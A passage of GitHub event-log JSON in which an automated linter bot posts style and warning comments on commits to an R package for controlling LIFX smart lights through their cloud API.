change\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:42:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L42) *style:* **Commented code should be removed.**\n```r\n​#   server_color(selector, hue=120, saturation=1, brightness=1, duration=0.1) # duration is speed of change\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:44:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L44) *style:* **Commented code should be removed.**\n```r\n​#     Sys.sleep(duration)\n      ^~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:46:29:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​#     server_color(selector, \n                            ^\n```\n[R/lifx-server.R:47:47:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L47) *style:* **Trailing whitespace is superfluous.**\n```r\n​#           hue = current[[1]]$color[[\"hue\"]], \n                                              ^\n```\n[R/lifx-server.R:53:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L53) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:54:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L54) *style:* **Commented code should be removed.**\n```r\n​# # Briefly set light(s) to red\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:57:4:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L57) *style:* **Trailing whitespace is superfluous.**\n```r\n​# # \n   ^\n```\n[R/lifx-server.R:59:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L59) *style:* **Commented code should be removed.**\n```r\n​#   current <- server_status(selector)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:60:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L60) *style:* **Lines should not be more than 80 characters.**\n```r\n​#   server_color(selector, hue=1, saturation=1, brightness=1, duration=0.1) # duration is speed of change\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:60:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L60) *style:* **Commented code should be removed.**\n```r\n​#   server_color(selector, hue=1, saturation=1, brightness=1, duration=0.1) # duration is speed of change\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:62:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L62) *style:* **Commented code should be removed.**\n```r\n​#     Sys.sleep(duration)\n      ^~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:64:29:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L64) *style:* **Trailing whitespace is superfluous.**\n```r\n​#     server_color(selector, \n                            ^\n```\n[R/lifx-server.R:65:47:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L65) *style:* **Trailing whitespace is superfluous.**\n```r\n​#           hue = current[[1]]$color[[\"hue\"]], \n                                              ^\n```\n[R/lifx-server.R:71:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L71) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:72:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[tests/testthat/test_inputs.R:8:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/tests/testthat/test_inputs.R#L8) *style:* **Lines should not be more than 80 characters.**\n```r\n​    expect_error(check_saturation(1.1), \"saturation needs to be between 0 and 1\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_inputs.R:9:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/tests/testthat/test_inputs.R#L9) *style:* **Lines should not be more than 80 characters.**\n```r\n​    expect_error(check_saturation(-0.5), \"saturation needs to be between 0 and 1\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-28T08:11:14Z"}
{"id":"8031892436","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"RMHogervorst/lifxr"},"payload":{"comment":{"id":29867393,"position":null,"line":null,"path":null,"commit_id":"6c37fb608513b781baa08a6dfae3b8ababd328af","created_at":"2018-07-28T08:11:20Z","updated_at":"2018-07-28T08:11:20Z","author_association":"NONE","body":"[R/lifx-cloud.R:3:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L3) *style:* **Variable or function name should be snake_case.**\n```r\n​BASE <- \"https://api.lifx.com\"\n^~~~\n```\n[R/lifx-cloud.R:4:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L4) *style:* **Variable or function name should be snake_case.**\n```r\n​VERSION <- \"v1\"\n^~~~~~~\n```\n[R/lifx-cloud.R:8:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L8) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(is.na(key))stop(\"No key found\")\n      ^\n```\n[R/lifx-cloud.R:12:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L12) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(hue < 0 | hue > 360){\n      ^\n```\n[R/lifx-cloud.R:18:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L18) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(value < 0 | value > 1){\n      ^\n```\n[R/lifx-cloud.R:24:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(value < 0 | value > 1){\n      ^\n```\n[R/lifx-cloud.R:31:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L31) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(value < 2500 | value > 9000){\n      ^\n```\n[R/lifx-cloud.R:38:16:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L38) *style:* **Trailing whitespace is superfluous.**\n```r\n​# except color. \n               ^\n```\n[R/lifx-cloud.R:43:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L43) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:51:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L51) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(results$status_code != 200)\n    ^\n```\n[R/lifx-cloud.R:58:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L58) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:60:74:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L60) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' @param selector a string in format '[type]:[value]', where type can be \n                                                                         ^\n```\n[R/lifx-cloud.R:61:73:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L61) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' 'all', 'id', 'label', 'group', 'group_id', 'location', 'location_id', \n                                                                        ^\n```\n[R/lifx-cloud.R:63:34:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L63) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' which needs no value argument. \n                                 ^\n```\n[R/lifx-cloud.R:64:56:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L64) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' @return a list of all lights, status, and properties \n                                                       ^\n```\n[R/lifx-cloud.R:74:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L74) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:80:17:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L80) *warning:* **no visible global function definition for ‘lights’, Did you mean 'weights'?**\n```r\n​  light_list <- lights(selector = selector)\n                ^~~~~~\n```\n[R/lifx-cloud.R:81:21:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L81) *style:* **Trailing whitespace is superfluous.**\n```r\n​  sapply(light_list, \n                    ^\n```\n[R/lifx-cloud.R:83:14:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L83) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​           if(light$color[[\"saturation\"]] > 0)\n             ^\n```\n[R/lifx-cloud.R:89:18:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L89) *style:* **Trailing whitespace is superfluous.**\n```r\n​             else \n                 ^\n```\n[R/lifx-cloud.R:90:32:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L90) *style:* **Trailing whitespace is superfluous.**\n```r\n​               paste(\"kelvin:\", \n                               ^\n```\n[R/lifx-cloud.R:91:46:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L91) *style:* **Trailing whitespace is superfluous.**\n```r\n​                     light$color[[\"kelvin\"]], \n                                             ^\n```\n[R/lifx-cloud.R:93:50:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L93) *style:* **Trailing whitespace is superfluous.**\n```r\n​                     light$brightness * 100, \"%\", \n                                                 ^\n```\n[R/lifx-cloud.R:100:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L100) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:106:67:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L106) *style:* **Trailing whitespace is superfluous.**\n```r\n​  results <- POST(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \n                                                                  ^\n```\n[R/lifx-cloud.R:107:42:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L107) *style:* **Trailing whitespace is superfluous.**\n```r\n​                         \"/toggle.json\"), \n                                         ^\n```\n[R/lifx-cloud.R:109:22:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L109) *warning:* **no visible global function definition for ‘content’, Did you mean 'confint'?**\n```r\n​  jsonlite::fromJSON(content(results, as = \"text\"))\n                     ^~~~~~~\n```\n[R/lifx-cloud.R:113:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L113) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:119:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L119) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @details Not exported because it conflicts with stats::power. see on() and off()\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:122:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L122) *style:* **Lines should not be more than 80 characters.**\n```r\n​  results <- PUT(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/state.json\"), \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:122:82:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L122) *style:* **Trailing whitespace is superfluous.**\n```r\n​  results <- PUT(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/state.json\"), \n                                                                                 ^\n```\n[R/lifx-cloud.R:123:34:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L123) *style:* **Trailing whitespace is superfluous.**\n```r\n​      query = list(power = state, \n                                 ^\n```\n[R/lifx-cloud.R:124:40:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L124) *style:* **Trailing whitespace is superfluous.**\n```r\n​                   duration = duration, \n                                       ^\n```\n[R/lifx-cloud.R:126:22:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L126) *warning:* **no visible global function definition for ‘content’, Did you mean 'confint'?**\n```r\n​  jsonlite::fromJSON(content(results, as = \"text\"))\n                     ^~~~~~~\n```\n[R/lifx-cloud.R:131:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L131) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:138:10:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L138) *warning:* **possible error in power(\"off\", selector = selector, duration = duration): unused arguments (selector = selector, duration = duration)**\n```r\n​  power(\"off\", selector = selector, duration = duration)\n         ^~~\n```\n[R/lifx-cloud.R:143:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L143) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:144:19:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L144) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' power lights on \n                  ^\n```\n[R/lifx-cloud.R:150:10:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L150) *warning:* **possible error in power(\"on\", selector = selector, duration = duration): unused arguments (selector = selector, duration = duration)**\n```r\n​  power(\"on\", selector = selector, duration = duration)\n         ^~\n```\n[R/lifx-cloud.R:155:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L155) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:159:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L159) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @param power_on should the light be powered on if it is off? (FALSE just leaves light off)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:161:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L161) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @details Note that the kelvin temperature ranges from 2700 to 8000. Hue in HSB list is \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:161:90:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L161) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' @details Note that the kelvin temperature ranges from 2700 to 8000. Hue in HSB list is \n                                                                                         ^\n```\n[R/lifx-cloud.R:162:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L162) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' a number between 0 and 360, whereas saturation and brightness should be between 0 and 1.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:163:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L163) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:165:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L165) *style:* **Lines should not be more than 80 characters.**\n```r\n​#'  color(\"green\", \"label:desk\")   # deep green, brightness untouched on lights labeled 'desk'\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:168:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L168) *style:* **Lines should not be more than 80 characters.**\n```r\n​#'  color(\"random\")                # random hue, maximum saturation, brightness untouched\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:175:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L175) *style:* **Lines should not be more than 80 characters.**\n```r\n​  results <- PUT(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/state.json\"), \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:175:82:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L175) *style:* **Trailing whitespace is superfluous.**\n```r\n​  results <- PUT(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/state.json\"), \n                                                                                 ^\n```\n[R/lifx-cloud.R:176:34:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L176) *style:* **Trailing whitespace is superfluous.**\n```r\n​      query = list(color = color, \n                                 ^\n```\n[R/lifx-cloud.R:177:40:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L177) *style:* **Trailing whitespace is superfluous.**\n```r\n​                   duration = duration, \n                                       ^\n```\n[R/lifx-cloud.R:180:22:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L180) *warning:* **no visible global function definition for ‘content’, Did you mean 'confint'?**\n```r\n​  jsonlite::fromJSON(content(results, as = \"text\"))\n                     ^~~~~~~\n```\n[R/lifx-cloud.R:185:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L185) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:187:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L187) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @param from_color Same syntax as color, defaults to current color (of first bulb in selection)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:190:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L190) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @param persist should the color persist after the effect? default is FALSE (returns to original color)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:197:65:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L197) *style:* **Trailing whitespace is superfluous.**\n```r\n​breathe <- function(color, from_color = current_color(selector), \n                                                                ^\n```\n[R/lifx-cloud.R:200:34:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L200) *style:* **Trailing whitespace is superfluous.**\n```r\n​  settings <- list(color = color, \n                                 ^\n```\n[R/lifx-cloud.R:208:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L208) *style:* **Lines should not be more than 80 characters.**\n```r\n​  results <- POST(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/effects/breathe\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:210:22:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L210) *warning:* **no visible global function definition for ‘content’, Did you mean 'confint'?**\n```r\n​  jsonlite::fromJSON(content(results, as = \"text\"))\n                     ^~~~~~~\n```\n[R/lifx-cloud.R:214:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L214) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:217:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L217) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @param duty_cycle Ratio of the period where color is active. Only used for pulse. Defaults to 0.5. Range: 0-1\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:220:68:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L220) *style:* **Trailing whitespace is superfluous.**\n```r\n​pulse <- function(color, from_color = current_color(selector)[[1]], \n                                                                   ^\n```\n[R/lifx-cloud.R:223:34:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L223) *style:* **Trailing whitespace is superfluous.**\n```r\n​  settings <- list(color = color, \n                                 ^\n```\n[R/lifx-cloud.R:231:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L231) *style:* **Lines should not be more than 80 characters.**\n```r\n​  results <- POST(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/effects/pulse.json\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:233:22:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L233) *warning:* **no visible global function definition for ‘content’, Did you mean 'confint'?**\n```r\n​  jsonlite::fromJSON(content(results, as = \"text\"))\n                     ^~~~~~~\n```\n[R/lifx-cloud.R:237:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L237) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:244:71:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L244) *style:* **Trailing whitespace is superfluous.**\n```r\n​  PUT(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/label.json\"), \n                                                                      ^\n```\n[R/lifx-cloud.R:245:34:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L245) *style:* **Trailing whitespace is superfluous.**\n```r\n​      query = list(label = label, \n                                 ^\n```\n[R/lifx-cloud.R:250:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L250) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:258:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L258) *style:* **Lines should not be more than 80 characters.**\n```r\n​  results <- PUT(paste0(BASE, \"/\", VERSION, \"/scenes/scene_id:\", scene_id, \"/activate.json\"), \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:258:94:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L258) *style:* **Trailing whitespace is superfluous.**\n```r\n​  results <- PUT(paste0(BASE, \"/\", VERSION, \"/scenes/scene_id:\", scene_id, \"/activate.json\"), \n                                                                                             ^\n```\n[R/lifx-cloud.R:259:34:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L259) *style:* **Trailing whitespace is superfluous.**\n```r\n​      query = list(state = state, \n                                 ^\n```\n[R/lifx-cloud.R:260:40:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L260) *style:* **Trailing whitespace is superfluous.**\n```r\n​                   duration = duration, \n                                       ^\n```\n[R/lifx-cloud.R:262:22:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L262) *warning:* **no visible global function definition for ‘content’, Did you mean 'confint'?**\n```r\n​  jsonlite::fromJSON(content(results, as = \"text\"))\n                     ^~~~~~~\n```\n[R/lifx-cloud.R:266:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L266) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  